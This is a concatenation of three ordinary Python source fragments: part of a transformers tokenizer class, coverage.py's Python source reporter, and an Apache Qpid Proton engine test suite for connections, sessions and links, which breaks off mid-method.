truncation=truncation_strategy.value,
max_length=max_length,
stride=stride,
pad_to_multiple_of=pad_to_multiple_of,
return_tensors=return_tensors,
prepend_batch_axis=True,
return_attention_mask=return_attention_mask,
return_token_type_ids=return_token_type_ids,
return_overflowing_tokens=return_overflowing_tokens,
return_special_tokens_mask=return_special_tokens_mask,
return_length=return_length,
verbose=verbose,
)
def _batch_encode_plus(
self,
batch_text_or_text_pairs: Union[
List[TextInput],
List[TextInputPair],
List[PreTokenizedInput],
List[PreTokenizedInputPair],
List[EncodedInput],
List[EncodedInputPair],
],
add_special_tokens: bool = True,
padding_strategy: PaddingStrategy = PaddingStrategy.DO_NOT_PAD,
truncation_strategy: TruncationStrategy = TruncationStrategy.DO_NOT_TRUNCATE,
max_length: Optional[int] = None,
stride: int = 0,
is_split_into_words: bool = False,
pad_to_multiple_of: Optional[int] = None,
return_tensors: Optional[Union[str, TensorType]] = None,
return_token_type_ids: Optional[bool] = None,
return_attention_mask: Optional[bool] = None,
return_overflowing_tokens: bool = False,
return_special_tokens_mask: bool = False,
return_offsets_mapping: bool = False,
return_length: bool = False,
verbose: bool = True,
**kwargs
) -> BatchEncoding:
def get_input_ids(text):
if isinstance(text, str):
tokens = self.tokenize(text, **kwargs)
return self.convert_tokens_to_ids(tokens)
elif isinstance(text, (list, tuple)) and len(text) > 0 and isinstance(text[0], str):
if is_split_into_words:
tokens = list(
itertools.chain(*(self.tokenize(t, is_split_into_words=True, **kwargs) for t in text))
)
return self.convert_tokens_to_ids(tokens)
else:
return self.convert_tokens_to_ids(text)
elif isinstance(text, (list, tuple)) and len(text) > 0 and isinstance(text[0], int):
return text
else:
raise ValueError(
"Input is not valid. Should be a string, a list/tuple of strings or a list/tuple of integers."
)
if return_offsets_mapping:
raise NotImplementedError(
"return_offset_mapping is not available when using Python tokenizers."
"To use this feature, change your tokenizer to one deriving from "
"transformers.PreTrainedTokenizerFast."
)
input_ids = []
for ids_or_pair_ids in batch_text_or_text_pairs:
if not isinstance(ids_or_pair_ids, (list, tuple)):
ids, pair_ids = ids_or_pair_ids, None
elif is_split_into_words and not isinstance(ids_or_pair_ids[0], (list, tuple)):
ids, pair_ids = ids_or_pair_ids, None
else:
ids, pair_ids = ids_or_pair_ids
first_ids = get_input_ids(ids)
second_ids = get_input_ids(pair_ids) if pair_ids is not None else None
input_ids.append((first_ids, second_ids))
batch_outputs = self._batch_prepare_for_model(
input_ids,
add_special_tokens=add_special_tokens,
padding_strategy=padding_strategy,
truncation_strategy=truncation_strategy,
max_length=max_length,
stride=stride,
pad_to_multiple_of=pad_to_multiple_of,
return_attention_mask=return_attention_mask,
return_token_type_ids=return_token_type_ids,
return_overflowing_tokens=return_overflowing_tokens,
return_special_tokens_mask=return_special_tokens_mask,
return_length=return_length,
return_tensors=return_tensors,
verbose=verbose,
)
return BatchEncoding(batch_outputs)
@add_end_docstrings(ENCODE_KWARGS_DOCSTRING, ENCODE_PLUS_ADDITIONAL_KWARGS_DOCSTRING)
def _batch_prepare_for_model(
self,
batch_ids_pairs: List[Union[PreTokenizedInputPair, Tuple[List[int], None]]],
add_special_tokens: bool = True,
padding_strategy: PaddingStrategy = PaddingStrategy.DO_NOT_PAD,
truncation_strategy: TruncationStrategy = TruncationStrategy.DO_NOT_TRUNCATE,
max_length: Optional[int] = None,
stride: int = 0,
pad_to_multiple_of: Optional[int] = None,
return_tensors: Optional[str] = None,
return_token_type_ids: Optional[bool] = None,
return_attention_mask: Optional[bool] = None,
return_overflowing_tokens: bool = False,
return_special_tokens_mask: bool = False,
return_length: bool = False,
verbose: bool = True,
) -> BatchEncoding:
"""
Prepares a sequence of input id, or a pair of sequences of inputs ids so that it can be used by the model. It
adds special tokens, truncates sequences if overflowing while taking into account the special tokens and
manages a moving window (with user defined stride) for overflowing tokens
Args:
batch_ids_pairs: list of tokenized input ids or input ids pairs
"""
batch_outputs = {}
for first_ids, second_ids in batch_ids_pairs:
outputs = self.prepare_for_model(
first_ids,
second_ids,
add_special_tokens=add_special_tokens,
padding=PaddingStrategy.DO_NOT_PAD.value, # we pad in batch afterward
truncation=truncation_strategy.value,
max_length=max_length,
stride=stride,
pad_to_multiple_of=None, # we pad in batch afterward
return_attention_mask=False, # we pad in batch afterward
return_token_type_ids=return_token_type_ids,
return_overflowing_tokens=return_overflowing_tokens,
return_special_tokens_mask=return_special_tokens_mask,
return_length=return_length,
return_tensors=None, # We convert the whole batch to tensors at the end
prepend_batch_axis=False,
verbose=verbose,
)
for key, value in outputs.items():
if key not in batch_outputs:
batch_outputs[key] = []
batch_outputs[key].append(value)
batch_outputs = self.pad(
batch_outputs,
padding=padding_strategy.value,
max_length=max_length,
pad_to_multiple_of=pad_to_multiple_of,
return_attention_mask=return_attention_mask,
)
batch_outputs = BatchEncoding(batch_outputs, tensor_type=return_tensors)
return batch_outputs
def prepare_for_tokenization(
self, text: str, is_split_into_words: bool = False, **kwargs
) -> Tuple[str, Dict[str, Any]]:
"""
Performs any necessary transformations before tokenization.
This method should pop the arguments from kwargs and return the remaining :obj:`kwargs` as well. We test the
:obj:`kwargs` at the end of the encoding process to be sure all the arguments have been used.
Args:
text (:obj:`str`):
The text to prepare.
is_split_into_words (:obj:`bool`, `optional`, defaults to :obj:`False`):
Whether or not the input is already pre-tokenized (e.g., split into words). If set to :obj:`True`, the
tokenizer assumes the input is already split into words (for instance, by splitting it on whitespace)
which it will tokenize. This is useful for NER or token classification.
kwargs:
Keyword arguments to use for the tokenization.
Returns:
:obj:`Tuple[str, Dict[str, Any]]`: The prepared text and the unused kwargs.
"""
return (text, kwargs)
def get_special_tokens_mask(
self, token_ids_0: List, token_ids_1: Optional[List] = None, already_has_special_tokens: bool = False
) -> List[int]:
"""
Retrieves sequence ids from a token list that has no special tokens added. This method is called when adding
special tokens using the tokenizer ``prepare_for_model`` or ``encode_plus`` methods.
Args:
token_ids_0 (:obj:`List[int]`):
List of ids of the first sequence.
token_ids_1 (:obj:`List[int]`, `optional`):
List of ids of the second sequence.
already_has_special_tokens (:obj:`bool`, `optional`, defaults to :obj:`False`):
Whether or not the token list is already formatted with special tokens for the model.
Returns:
A list of integers in the range [0, 1]: 1 for a special token, 0 for a sequence token.
"""
if already_has_special_tokens:
if token_ids_1 is not None:
raise ValueError(
"You should not supply a second sequence if the provided sequence of "
"ids is already formatted with special tokens for the model."
)
return super().get_special_tokens_mask(
token_ids_0=token_ids_0, token_ids_1=token_ids_1, already_has_special_tokens=True
)
return [0] * ((len(token_ids_1) if token_ids_1 else 0) + len(token_ids_0))
@overload
def convert_ids_to_tokens(self, ids: int, skip_special_tokens: bool = False) -> str:
...
@overload
def convert_ids_to_tokens(self, ids: List[int], skip_special_tokens: bool = False) -> List[str]:
...
def convert_ids_to_tokens(
self, ids: Union[int, List[int]], skip_special_tokens: bool = False
) -> Union[str, List[str]]:
"""
Converts a single index or a sequence of indices in a token or a sequence of tokens, using the vocabulary and
added tokens.
Args:
ids (:obj:`int` or :obj:`List[int]`):
The token id (or token ids) to convert to tokens.
skip_special_tokens (:obj:`bool`, `optional`, defaults to :obj:`False`):
Whether or not to remove special tokens in the decoding.
Returns:
:obj:`str` or :obj:`List[str]`: The decoded token(s).
"""
if isinstance(ids, int):
if ids in self.added_tokens_decoder:
return self.added_tokens_decoder[ids]
else:
return self._convert_id_to_token(ids)
tokens = []
for index in ids:
index = int(index)
if skip_special_tokens and index in self.all_special_ids:
continue
if index in self.added_tokens_decoder:
tokens.append(self.added_tokens_decoder[index])
else:
tokens.append(self._convert_id_to_token(index))
return tokens
def _convert_id_to_token(self, index: int) -> str:
raise NotImplementedError
def convert_tokens_to_string(self, tokens: List[str]) -> str:
return " ".join(tokens)
def _decode(
self,
token_ids: List[int],
skip_special_tokens: bool = False,
clean_up_tokenization_spaces: bool = True,
spaces_between_special_tokens: bool = True,
**kwargs
) -> str:
self._decode_use_source_tokenizer = kwargs.pop("use_source_tokenizer", False)
filtered_tokens = self.convert_ids_to_tokens(token_ids, skip_special_tokens=skip_special_tokens)
# To avoid mixing byte-level and unicode for byte-level BPT
# we need to build string separately for added tokens and byte-level tokens
# cf. https://github.com/huggingface/transformers/issues/1133
sub_texts = []
current_sub_text = []
for token in filtered_tokens:
if skip_special_tokens and token in self.all_special_ids:
continue
if token in self.added_tokens_encoder:
if current_sub_text:
sub_texts.append(self.convert_tokens_to_string(current_sub_text))
current_sub_text = []
sub_texts.append(token)
else:
current_sub_text.append(token)
if current_sub_text:
sub_texts.append(self.convert_tokens_to_string(current_sub_text))
if spaces_between_special_tokens:
text = " ".join(sub_texts)
else:
text = "".join(sub_texts)
if clean_up_tokenization_spaces:
clean_text = self.clean_up_tokenization(text)
return clean_text
else:
return text
| |
# Licensed under the Apache License: http://www.apache.org/licenses/LICENSE-2.0
# For details: https://bitbucket.org/ned/coveragepy/src/default/NOTICE.txt
"""Python source expertise for coverage.py"""
import os.path
import types
import zipimport
from coverage import env, files
from coverage.misc import (
contract, CoverageException, expensive, NoSource, join_regex, isolate_module,
)
from coverage.parser import PythonParser
from coverage.phystokens import source_token_lines, source_encoding
from coverage.plugin import FileReporter
os = isolate_module(os)
@contract(returns='bytes')
def read_python_source(filename):
"""Read the Python source text from `filename`.
Returns bytes.
"""
with open(filename, "rb") as f:
return f.read().replace(b"\r\n", b"\n").replace(b"\r", b"\n")
@contract(returns='unicode')
def get_python_source(filename):
"""Return the source code, as unicode."""
base, ext = os.path.splitext(filename)
if ext == ".py" and env.WINDOWS:
exts = [".py", ".pyw"]
else:
exts = [ext]
for ext in exts:
try_filename = base + ext
if os.path.exists(try_filename):
# A regular text file: open it.
source = read_python_source(try_filename)
break
# Maybe it's in a zip file?
source = get_zip_bytes(try_filename)
if source is not None:
break
else:
# Couldn't find source.
exc_msg = "No source for code: '%s'.\n" % (filename,)
exc_msg += "Aborting report output, consider using -i."
raise NoSource(exc_msg)
# Replace \f because of http://bugs.python.org/issue19035
source = source.replace(b'\f', b' ')
source = source.decode(source_encoding(source), "replace")
# Python code should always end with a line with a newline.
if source and source[-1] != '\n':
source += '\n'
return source
@contract(returns='bytes|None')
def get_zip_bytes(filename):
"""Get data from `filename` if it is a zip file path.
Returns the bytestring data read from the zip file, or None if no zip file
could be found or `filename` isn't in it. The data returned will be
an empty string if the file is empty.
"""
markers = ['.zip'+os.sep, '.egg'+os.sep]
for marker in markers:
if marker in filename:
parts = filename.split(marker)
try:
zi = zipimport.zipimporter(parts[0]+marker[:-1])
except zipimport.ZipImportError:
continue
try:
data = zi.get_data(parts[1])
except IOError:
continue
return data
return None
class PythonFileReporter(FileReporter):
"""Report support for a Python file."""
def __init__(self, morf, coverage=None):
self.coverage = coverage
if hasattr(morf, '__file__'):
filename = morf.__file__
elif isinstance(morf, types.ModuleType):
# A module should have had .__file__, otherwise we can't use it.
# This could be a PEP-420 namespace package.
raise CoverageException("Module {0} has no file".format(morf))
else:
filename = morf
filename = files.unicode_filename(filename)
# .pyc files should always refer to a .py instead.
if filename.endswith(('.pyc', '.pyo')):
filename = filename[:-1]
elif filename.endswith('$py.class'): # Jython
filename = filename[:-9] + ".py"
super(PythonFileReporter, self).__init__(files.canonical_filename(filename))
if hasattr(morf, '__name__'):
name = morf.__name__
name = name.replace(".", os.sep) + ".py"
name = files.unicode_filename(name)
else:
name = files.relative_filename(filename)
self.relname = name
self._source = None
self._parser = None
self._statements = None
self._excluded = None
@contract(returns='unicode')
def relative_filename(self):
return self.relname
@property
def parser(self):
"""Lazily create a :class:`PythonParser`."""
if self._parser is None:
self._parser = PythonParser(
filename=self.filename,
exclude=self.coverage._exclude_regex('exclude'),
)
self._parser.parse_source()
return self._parser
def lines(self):
"""Return the line numbers of statements in the file."""
return self.parser.statements
def excluded_lines(self):
"""Return the line numbers of statements in the file."""
return self.parser.excluded
def translate_lines(self, lines):
return self.parser.translate_lines(lines)
def translate_arcs(self, arcs):
return self.parser.translate_arcs(arcs)
@expensive
def no_branch_lines(self):
no_branch = self.parser.lines_matching(
join_regex(self.coverage.config.partial_list),
join_regex(self.coverage.config.partial_always_list)
)
return no_branch
@expensive
def arcs(self):
return self.parser.arcs()
@expensive
def exit_counts(self):
return self.parser.exit_counts()
def missing_arc_description(self, start, end, executed_arcs=None):
return self.parser.missing_arc_description(start, end, executed_arcs)
@contract(returns='unicode')
def source(self):
if self._source is None:
self._source = get_python_source(self.filename)
return self._source
def should_be_python(self):
"""Does it seem like this file should contain Python?
This is used to decide if a file reported as part of the execution of
a program was really likely to have contained Python in the first
place.
"""
# Get the file extension.
_, ext = os.path.splitext(self.filename)
# Anything named *.py* should be Python.
if ext.startswith('.py'):
return True
# A file with no extension should be Python.
if not ext:
return True
# Everything else is probably not Python.
return False
def source_token_lines(self):
return source_token_lines(self.source())
| |
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import os, common
from time import time, sleep
from proton import *
from common import pump
# future test areas
# + different permutations of setup
# - creating deliveries and calling input/output before opening the session/link
# + shrinking output_size down to something small? should the enginge buffer?
# + resuming
# - locally and remotely created deliveries with the same tag
OUTPUT_SIZE = 10*1024
class Test(common.Test):
def __init__(self, *args):
common.Test.__init__(self, *args)
self._wires = []
def connection(self):
c1 = Connection()
c2 = Connection()
t1 = Transport()
t1.bind(c1)
c1._transport = t1
t2 = Transport()
t2.bind(c2)
c2._transport = t2
self._wires.append((c1, t1, c2, t2))
mask1 = 0
mask2 = 0
for cat in ("TRACE_FRM", "TRACE_RAW"):
trc = os.environ.get("PN_%s" % cat)
if trc and trc.lower() in ("1", "2", "yes", "true"):
mask1 = mask1 | getattr(Transport, cat)
if trc == "2":
mask2 = mask2 | getattr(Transport, cat)
t1.trace(mask1)
t2.trace(mask2)
return c1, c2
def link(self, name, max_frame=None, idle_timeout=None):
c1, c2 = self.connection()
if max_frame:
c1._transport.max_frame_size = max_frame[0]
c2._transport.max_frame_size = max_frame[1]
if idle_timeout:
# idle_timeout in seconds expressed as float
c1._transport.idle_timeout = idle_timeout[0]
c2._transport.idle_timeout = idle_timeout[1]
c1.open()
c2.open()
ssn1 = c1.session()
ssn1.open()
self.pump()
ssn2 = c2.session_head(Endpoint.LOCAL_UNINIT | Endpoint.REMOTE_ACTIVE)
ssn2.open()
self.pump()
snd = ssn1.sender(name)
rcv = ssn2.receiver(name)
return snd, rcv
def cleanup(self):
pass
def pump(self, buffer_size=OUTPUT_SIZE):
for c1, t1, c2, t2 in self._wires:
pump(t1, t2, buffer_size)
class ConnectionTest(Test):
def setup(self):
self.c1, self.c2 = self.connection()
def teardown(self):
self.cleanup()
def test_open_close(self):
assert self.c1.state == Endpoint.LOCAL_UNINIT | Endpoint.REMOTE_UNINIT
assert self.c2.state == Endpoint.LOCAL_UNINIT | Endpoint.REMOTE_UNINIT
self.c1.open()
self.pump()
assert self.c1.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_UNINIT
assert self.c2.state == Endpoint.LOCAL_UNINIT | Endpoint.REMOTE_ACTIVE
self.c2.open()
self.pump()
assert self.c1.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
assert self.c2.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
self.c1.close()
self.pump()
assert self.c1.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_ACTIVE
assert self.c2.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_CLOSED
self.c2.close()
self.pump()
assert self.c1.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_CLOSED
assert self.c2.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_CLOSED
def test_simultaneous_open_close(self):
assert self.c1.state == Endpoint.LOCAL_UNINIT | Endpoint.REMOTE_UNINIT
assert self.c2.state == Endpoint.LOCAL_UNINIT | Endpoint.REMOTE_UNINIT
self.c1.open()
self.c2.open()
self.pump()
assert self.c1.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
assert self.c2.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
self.c1.close()
self.c2.close()
self.pump()
assert self.c1.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_CLOSED
assert self.c2.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_CLOSED
def test_capabilities(self):
self.c1.offered_capabilities = Array(UNDESCRIBED, Data.SYMBOL,
symbol("O_one"),
symbol("O_two"),
symbol("O_three"))
self.c1.desired_capabilities = Array(UNDESCRIBED, Data.SYMBOL,
symbol("D_one"),
symbol("D_two"),
symbol("D_three"))
self.c1.open()
assert self.c2.remote_offered_capabilities is None
assert self.c2.remote_desired_capabilities is None
self.pump()
assert self.c2.remote_offered_capabilities == self.c1.offered_capabilities, \
(self.c2.remote_offered_capabilities, self.c1.offered_capabilities)
assert self.c2.remote_desired_capabilities == self.c1.desired_capabilities, \
(self.c2.remote_desired_capabilities, self.c1.desired_capabilities)
def test_condition(self):
self.c1.open()
self.c2.open()
self.pump()
assert self.c1.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
assert self.c2.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
cond = Condition("blah:bleh", "this is a description", {symbol("foo"): "bar"})
self.c1.condition = cond
self.c1.close()
self.pump()
assert self.c1.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_ACTIVE
assert self.c2.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_CLOSED
rcond = self.c2.remote_condition
assert rcond == cond, (rcond, cond)
def test_properties(self, p1={symbol("key"): symbol("value")}, p2=None):
self.c1.properties = p1
self.c2.properties = p2
self.c1.open()
self.c2.open()
self.pump()
assert self.c2.remote_properties == p1, (self.c2.remote_properties, p1)
assert self.c1.remote_properties == p2, (self.c2.remote_properties, p2)
class SessionTest(Test):
def setup(self):
self.c1, self.c2 = self.connection()
self.ssn = self.c1.session()
self.c1.open()
self.c2.open()
def teardown(self):
self.cleanup()
def test_open_close(self):
assert self.ssn.state == Endpoint.LOCAL_UNINIT | Endpoint.REMOTE_UNINIT
self.ssn.open()
assert self.ssn.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_UNINIT
self.pump()
assert self.ssn.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_UNINIT
ssn = self.c2.session_head(Endpoint.REMOTE_ACTIVE | Endpoint.LOCAL_UNINIT)
assert ssn != None
assert ssn.state == Endpoint.LOCAL_UNINIT | Endpoint.REMOTE_ACTIVE
assert self.ssn.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_UNINIT
ssn.open()
assert ssn.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
assert self.ssn.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_UNINIT
self.pump()
assert ssn.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
assert self.ssn.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
ssn.close()
assert ssn.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_ACTIVE
assert self.ssn.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
self.pump()
assert ssn.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_ACTIVE
assert self.ssn.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_CLOSED
self.ssn.close()
assert ssn.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_ACTIVE
assert self.ssn.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_CLOSED
self.pump()
assert ssn.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_CLOSED
assert self.ssn.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_CLOSED
def test_simultaneous_close(self):
self.ssn.open()
self.pump()
ssn = self.c2.session_head(Endpoint.REMOTE_ACTIVE | Endpoint.LOCAL_UNINIT)
assert ssn != None
ssn.open()
self.pump()
assert self.ssn.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
assert ssn.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
self.ssn.close()
ssn.close()
assert self.ssn.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_ACTIVE
assert ssn.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_ACTIVE
self.pump()
assert self.ssn.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_CLOSED
assert ssn.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_CLOSED
def test_closing_connection(self):
self.ssn.open()
self.pump()
self.c1.close()
self.pump()
self.ssn.close()
self.pump()
def test_condition(self):
self.ssn.open()
self.pump()
ssn = self.c2.session_head(Endpoint.REMOTE_ACTIVE | Endpoint.LOCAL_UNINIT)
assert ssn != None
ssn.open()
self.pump()
assert self.ssn.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
assert ssn.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
cond = Condition("blah:bleh", "this is a description", {symbol("foo"): "bar"})
self.ssn.condition = cond
self.ssn.close()
self.pump()
assert self.ssn.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_ACTIVE
assert ssn.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_CLOSED
rcond = ssn.remote_condition
assert rcond == cond, (rcond, cond)
class LinkTest(Test):
def setup(self):
self.snd, self.rcv = self.link("test-link")
def teardown(self):
self.cleanup()
def test_open_close(self):
assert self.snd.state == Endpoint.LOCAL_UNINIT | Endpoint.REMOTE_UNINIT
assert self.rcv.state == Endpoint.LOCAL_UNINIT | Endpoint.REMOTE_UNINIT
self.snd.open()
assert self.snd.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_UNINIT
assert self.rcv.state == Endpoint.LOCAL_UNINIT | Endpoint.REMOTE_UNINIT
self.pump()
assert self.snd.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_UNINIT
assert self.rcv.state == Endpoint.LOCAL_UNINIT | Endpoint.REMOTE_ACTIVE
self.rcv.open()
assert self.snd.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_UNINIT
assert self.rcv.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
self.pump()
assert self.snd.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
assert self.rcv.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
self.snd.close()
assert self.snd.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_ACTIVE
assert self.rcv.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
self.pump()
assert self.snd.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_ACTIVE
assert self.rcv.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_CLOSED
self.rcv.close()
assert self.snd.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_ACTIVE
assert self.rcv.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_CLOSED
self.pump()
assert self.snd.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_CLOSED
assert self.rcv.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_CLOSED
def test_simultaneous_open_close(self):
assert self.snd.state == Endpoint.LOCAL_UNINIT | Endpoint.REMOTE_UNINIT
assert self.rcv.state == Endpoint.LOCAL_UNINIT | Endpoint.REMOTE_UNINIT
self.snd.open()
self.rcv.open()
assert self.snd.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_UNINIT
assert self.rcv.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_UNINIT
self.pump()
assert self.snd.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
assert self.rcv.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
self.snd.close()
self.rcv.close()
assert self.snd.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_ACTIVE
assert self.rcv.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_ACTIVE
self.pump()
assert self.snd.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_CLOSED
assert self.rcv.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_CLOSED
def test_multiple(self):
rcv = self.snd.session.receiver("second-rcv")
assert rcv.name == "second-rcv"
self.snd.open()
rcv.open()
self.pump()
c2 = self.rcv.session.connection
l = c2.link_head(Endpoint.LOCAL_UNINIT | Endpoint.REMOTE_ACTIVE)
while l:
l.open()
l = l.next(Endpoint.LOCAL_UNINIT | Endpoint.REMOTE_ACTIVE)
self.pump()
assert self.snd
assert rcv
self.snd.close()
rcv.close()
ssn = rcv.session
conn = ssn.connection
ssn.close()
conn.close()
self.pump()
def test_closing_session(self):
self.snd.open()
self.rcv.open()
ssn1 = self.snd.session
self.pump()
ssn1.close()
self.pump()
self.snd.close()
self.pump()
def test_closing_connection(self):
self.snd.open()
self.rcv.open()
ssn1 = self.snd.session
c1 = ssn1.connection
self.pump()
c1.close()
self.pump()
self.snd.close()
self.pump()
def assertEqualTermini(self, t1, t2):
assert t1.type == t2.type, (t1.type, t2.type)
assert t1.address == t2.address, (t1.address, t2.address)
assert t1.durability == t2.durability, (t1.durability, t2.durability)
assert t1.expiry_policy == t2.expiry_policy, (t1.expiry_policy, t2.expiry_policy)
assert t1.timeout == t2.timeout, (t1.timeout, t2.timeout)
assert t1.dynamic == t2.dynamic, (t1.dynamic, t2.dynamic)
for attr in ["properties", "capabilities", "outcomes", "filter"]:
d1 = getattr(t1, attr)
d2 = getattr(t2, attr)
assert d1.format() == d2.format(), (attr, d1.format(), d2.format())
def _test_source_target(self, config_source, config_target):
if config_source is None:
self.snd.source.type = Terminus.UNSPECIFIED
else:
config_source(self.snd.source)
if config_target is None:
self.snd.target.type = Terminus.UNSPECIFIED
else:
config_target(self.snd.target)
self.snd.open()
self.pump()
self.assertEqualTermini(self.rcv.remote_source, self.snd.source)
self.assertEqualTermini(self.rcv.remote_target, self.snd.target)
self.rcv.target.copy(self.rcv.remote_target)
self.rcv.source.copy(self.rcv.remote_source)
self.rcv.open()
self.pump()
self.assertEqualTermini(self.snd.remote_target, self.snd.target)
self.assertEqualTermini(self.snd.remote_source, self.snd.source)
def test_source_target(self):
self._test_source_target(TerminusConfig(address="source"),
TerminusConfig(address="target"))
def test_source(self):
self._test_source_target(TerminusConfig(address="source"), None)
def test_target(self):
self._test_source_target(None, TerminusConfig(address="target"))
def test_source_target_full(self):
self._test_source_target(TerminusConfig(address="source",
timeout=3,
dist_mode=Terminus.DIST_MODE_MOVE,
filter=[("int", 1), ("symbol", "two"), ("string", "three")],
capabilities=["one", "two", "three"]),
TerminusConfig(address="source",
timeout=7,
capabilities=[]))
def test_distribution_mode(self):
self._test_source_target(TerminusConfig(address="source",
dist_mode=Terminus.DIST_MODE_COPY),
TerminusConfig(address="target"))
assert self.rcv.remote_source.distribution_mode == Terminus.DIST_MODE_COPY
assert self.rcv.remote_target.distribution_mode == Terminus.DIST_MODE_UNSPECIFIED
def test_dynamic_link(self):
self._test_source_target(TerminusConfig(address=None, dynamic=True), None)
assert self.rcv.remote_source.dynamic
assert self.rcv.remote_source.address is None
def test_condition(self):
self.snd.open()
self.rcv.open()
self.pump()
assert self.snd.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
assert self.rcv.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
cond = Condition("blah:bleh", "this is a description", {symbol("foo"): "bar"})
self.snd.condition = cond
self.snd.close()
self.pump()
assert self.snd.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_ACTIVE
assert self.rcv.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_CLOSED
rcond = self.rcv.remote_condition
assert rcond == cond, (rcond, cond)
def test_settle_mode(self):
self.snd.snd_settle_mode = Link.SND_UNSETTLED
assert self.snd.snd_settle_mode == Link.SND_UNSETTLED
self.rcv.rcv_settle_mode = Link.RCV_SECOND
assert self.rcv.rcv_settle_mode == Link.RCV_SECOND
assert self.snd.remote_rcv_settle_mode != Link.RCV_SECOND
assert self.rcv.remote_snd_settle_mode != Link.SND_UNSETTLED
self.snd.open()
self.rcv.open()
self.pump()
assert self.snd.remote_rcv_settle_mode == Link.RCV_SECOND
assert self.rcv.remote_snd_settle_mode == Link.SND_UNSETTLED
class TerminusConfig:
def __init__(self, address=None, timeout=None, durability=None, filter=None,
capabilities=None, dynamic=False, dist_mode=None):
self.address = address
self.timeout = timeout
self.durability = durability
self.filter = filter
self.capabilities = capabilities
self.dynamic = dynamic
self.dist_mode = dist_mode
def __call__(self, terminus):
if self.address is not None:
terminus.address = self.address
if self.timeout is not None:
terminus.timeout = self.timeout
if self.durability is not None:
terminus.durability = self.durability
if self.capabilities is not None:
terminus.capabilities.put_array(False, Data.SYMBOL)
terminus.capabilities.enter()
for c in self.capabilities:
terminus.capabilities.put_symbol(c)
if self.filter is not None:
terminus.filter.put_list()
terminus.filter.enter()
for (t, v) in self.filter:
setter = getattr(terminus.filter, "put_%s" % t)
setter(v)
if self.dynamic:
